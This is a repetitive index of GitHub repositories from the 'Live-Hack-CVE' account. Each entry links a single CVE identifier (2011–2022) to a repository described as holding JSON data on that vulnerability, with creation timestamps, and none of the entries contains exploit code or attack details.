**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-25002 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-25002](https://github.com/Live-Hack-CVE/CVE-2021-25002) create time: 2022-12-24T04:59:23Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-20066 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-20066](https://github.com/Live-Hack-CVE/CVE-2021-20066) create time: 2022-12-24T04:58:26Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-28664 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-28664](https://github.com/Live-Hack-CVE/CVE-2021-28664) create time: 2022-12-24T04:57:49Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-36260 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-36260](https://github.com/Live-Hack-CVE/CVE-2021-36260) create time: 2022-12-24T04:57:45Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-29447 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-29447](https://github.com/Live-Hack-CVE/CVE-2021-29447) create time: 2022-12-24T04:42:48Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-45931 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-45931](https://github.com/Live-Hack-CVE/CVE-2021-45931) create time: 2022-12-24T04:40:06Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-33477 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-33477](https://github.com/Live-Hack-CVE/CVE-2021-33477) create time: 2022-12-24T04:40:03Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-36386 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-36386](https://github.com/Live-Hack-CVE/CVE-2021-36386) create time: 2022-12-24T04:39:46Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-39272 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-39272](https://github.com/Live-Hack-CVE/CVE-2021-39272) create time: 2022-12-24T04:39:40Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-3981 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-3981](https://github.com/Live-Hack-CVE/CVE-2021-3981) create time: 2022-12-24T04:39:34Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-24653 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-24653](https://github.com/Live-Hack-CVE/CVE-2021-24653) create time: 2022-12-24T04:39:30Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-34798 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-34798](https://github.com/Live-Hack-CVE/CVE-2021-34798) create time: 2022-12-24T04:38:59Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-0518 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-0518](https://github.com/Live-Hack-CVE/CVE-2021-0518) create time: 2022-12-24T04:38:52Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-28700 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-28700](https://github.com/Live-Hack-CVE/CVE-2021-28700) create time: 2022-12-24T04:38:49Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-25738 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-25738](https://github.com/Live-Hack-CVE/CVE-2021-25738) create time: 2022-12-24T04:38:43Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-41524 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-41524](https://github.com/Live-Hack-CVE/CVE-2021-41524) create time: 2022-12-24T04:38:39Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-38374 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-38374](https://github.com/Live-Hack-CVE/CVE-2021-38374) create time: 2022-12-24T04:38:33Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-0981 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-0981](https://github.com/Live-Hack-CVE/CVE-2021-0981) create time: 2022-12-24T04:38:29Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-20077 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-20077](https://github.com/Live-Hack-CVE/CVE-2021-20077) create time: 2022-12-24T04:38:17Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-3697 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-3697](https://github.com/Live-Hack-CVE/CVE-2021-3697) create time: 2022-12-24T04:37:52Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-3695 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-3695](https://github.com/Live-Hack-CVE/CVE-2021-3695) create time: 2022-12-24T04:36:44Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-41773 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-41773](https://github.com/Live-Hack-CVE/CVE-2021-41773) create time: 2022-12-24T04:36:34Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-3696 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-3696](https://github.com/Live-Hack-CVE/CVE-2021-3696) create time: 2022-12-24T04:36:31Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-28701 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-28701](https://github.com/Live-Hack-CVE/CVE-2021-28701) create time: 2022-12-24T04:36:24Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-3058 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-3058](https://github.com/Live-Hack-CVE/CVE-2022-3058) create time: 2022-12-24T04:59:50Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-3057 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-3057](https://github.com/Live-Hack-CVE/CVE-2022-3057) create time: 2022-12-24T04:59:46Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-3056 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-3056](https://github.com/Live-Hack-CVE/CVE-2022-3056) create time: 2022-12-24T04:59:42Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-38342 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-38342](https://github.com/Live-Hack-CVE/CVE-2022-38342) create time: 2022-12-24T04:59:39Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-30767 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-30767](https://github.com/Live-Hack-CVE/CVE-2022-30767) create time: 2022-12-24T04:59:36Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-30770 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-30770](https://github.com/Live-Hack-CVE/CVE-2022-30770) create time: 2022-12-24T04:59:20Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-38171 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-38171](https://github.com/Live-Hack-CVE/CVE-2022-38171) create time: 2022-12-24T04:59:17Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-35882 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-35882](https://github.com/Live-Hack-CVE/CVE-2022-35882) create time: 2022-12-24T04:59:13Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-2497 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-2497](https://github.com/Live-Hack-CVE/CVE-2022-2497) create time: 2022-12-24T04:59:10Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-1095 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-1095](https://github.com/Live-Hack-CVE/CVE-2022-1095) create time: 2022-12-24T04:59:07Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-33891 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-33891](https://github.com/Live-Hack-CVE/CVE-2022-33891) create time: 2022-12-24T04:59:04Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-0897 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-0897](https://github.com/Live-Hack-CVE/CVE-2022-0897) create time: 2022-12-24T04:58:47Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-29023 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-29023](https://github.com/Live-Hack-CVE/CVE-2022-29023) create time: 2022-12-24T04:58:44Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-33070 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-33070](https://github.com/Live-Hack-CVE/CVE-2022-33070) create time: 2022-12-24T04:58:41Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-29022 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-29022](https://github.com/Live-Hack-CVE/CVE-2022-29022) create time: 2022-12-24T04:58:38Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-29021 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-29021](https://github.com/Live-Hack-CVE/CVE-2022-29021) create time: 2022-12-24T04:58:32Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-1127 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-1127](https://github.com/Live-Hack-CVE/CVE-2022-1127) create time: 2022-12-24T04:57:42Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-1125 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-1125](https://github.com/Live-Hack-CVE/CVE-2022-1125) create time: 2022-12-24T04:57:38Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-1096 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-1096](https://github.com/Live-Hack-CVE/CVE-2022-1096) create time: 2022-12-24T04:57:34Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-34115 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-34115](https://github.com/Live-Hack-CVE/CVE-2022-34115) create time: 2022-12-24T04:57:31Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-0980 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-0980](https://github.com/Live-Hack-CVE/CVE-2022-0980) create time: 2022-12-24T04:57:28Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-0979 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-0979](https://github.com/Live-Hack-CVE/CVE-2022-0979) create time: 2022-12-24T04:57:24Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-21294 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-21294](https://github.com/Live-Hack-CVE/CVE-2022-21294) create time: 2022-12-24T04:57:20Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-21293 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-21293](https://github.com/Live-Hack-CVE/CVE-2022-21293) create time: 2022-12-24T04:57:17Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-0978 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-0978](https://github.com/Live-Hack-CVE/CVE-2022-0978) create time: 2022-12-24T04:57:14Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-21366 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-21366](https://github.com/Live-Hack-CVE/CVE-2022-21366) create time: 2022-12-24T04:57:10Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-21296 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-21296](https://github.com/Live-Hack-CVE/CVE-2022-21296) create time: 2022-12-24T04:57:07Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-21283 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-21283](https://github.com/Live-Hack-CVE/CVE-2022-21283) create time: 2022-12-24T04:57:04Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-21277 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-21277](https://github.com/Live-Hack-CVE/CVE-2022-21277) create time: 2022-12-24T04:57:00Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-21271 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-21271](https://github.com/Live-Hack-CVE/CVE-2022-21271) create time: 2022-12-24T04:56:57Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2011-4820 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2011-4820](https://github.com/Live-Hack-CVE/CVE-2011-4820) create time: 2022-12-24T03:22:38Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2012-2201 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2012-2201](https://github.com/Live-Hack-CVE/CVE-2012-2201) create time: 2022-12-24T03:22:34Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2012-2160 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2012-2160](https://github.com/Live-Hack-CVE/CVE-2012-2160) create time: 2022-12-24T03:22:31Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2012-4818 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2012-4818](https://github.com/Live-Hack-CVE/CVE-2012-4818) create time: 2022-12-24T03:22:28Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2014-3487 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2014-3487](https://github.com/Live-Hack-CVE/CVE-2014-3487) create time: 2022-12-24T03:21:12Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2014-2270 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2014-2270](https://github.com/Live-Hack-CVE/CVE-2014-2270) create time: 2022-12-24T03:21:09Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2014-3480 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2014-3480](https://github.com/Live-Hack-CVE/CVE-2014-3480) create time: 2022-12-24T03:21:06Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2014-3479 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2014-3479](https://github.com/Live-Hack-CVE/CVE-2014-3479) create time: 2022-12-24T03:21:02Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2017-3641 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2017-3641](https://github.com/Live-Hack-CVE/CVE-2017-3641) create time: 2022-12-24T03:58:00Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2017-16544 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2017-16544](https://github.com/Live-Hack-CVE/CVE-2017-16544) create time: 2022-12-24T03:57:26Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2018-14550 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2018-14550](https://github.com/Live-Hack-CVE/CVE-2018-14550) create time: 2022-12-24T04:06:14Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2018-16530 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2018-16530](https://github.com/Live-Hack-CVE/CVE-2018-16530) create time: 2022-12-24T03:58:25Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2018-17774 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2018-17774](https://github.com/Live-Hack-CVE/CVE-2018-17774) create time: 2022-12-24T03:21:15Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2018-21010 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2018-21010](https://github.com/Live-Hack-CVE/CVE-2018-21010) create time: 2022-12-24T03:20:21Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-13990 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-13990](https://github.com/Live-Hack-CVE/CVE-2019-13990) create time: 2022-12-24T04:06:10Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-5747 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-5747](https://github.com/Live-Hack-CVE/CVE-2019-5747) create time: 2022-12-24T03:20:27Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-10746 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-10746](https://github.com/Live-Hack-CVE/CVE-2019-10746) create time: 2022-12-24T03:20:24Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-16942 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-16942](https://github.com/Live-Hack-CVE/CVE-2019-16942) create time: 2022-12-24T03:20:18Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-0210 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-0210](https://github.com/Live-Hack-CVE/CVE-2019-0210) create time: 2022-12-24T03:20:15Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-16943 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-16943](https://github.com/Live-Hack-CVE/CVE-2019-16943) create time: 2022-12-24T03:20:11Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-17531 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-17531](https://github.com/Live-Hack-CVE/CVE-2019-17531) create time: 2022-12-24T03:20:08Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-2922 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-2922](https://github.com/Live-Hack-CVE/CVE-2020-2922) create time: 2022-12-24T04:05:07Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-26217 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-26217](https://github.com/Live-Hack-CVE/CVE-2020-26217) create time: 2022-12-24T04:05:03Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-10283 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-10283](https://github.com/Live-Hack-CVE/CVE-2020-10283) create time: 2022-12-24T03:59:58Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-1752 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-1752](https://github.com/Live-Hack-CVE/CVE-2020-1752) create time: 2022-12-24T03:55:45Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-27618 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-27618](https://github.com/Live-Hack-CVE/CVE-2020-27618) create time: 2022-12-24T03:55:41Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-29505 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-29505](https://github.com/Live-Hack-CVE/CVE-2020-29505) create time: 2022-12-24T03:21:29Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-6567 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-6567](https://github.com/Live-Hack-CVE/CVE-2020-6567) create time: 2022-12-24T03:21:26Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-6568 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-6568](https://github.com/Live-Hack-CVE/CVE-2020-6568) create time: 2022-12-24T03:21:22Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-6478 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-6478](https://github.com/Live-Hack-CVE/CVE-2020-6478) create time: 2022-12-24T03:21:18Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-6469 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-6469](https://github.com/Live-Hack-CVE/CVE-2020-6469) create time: 2022-12-24T03:20:58Z

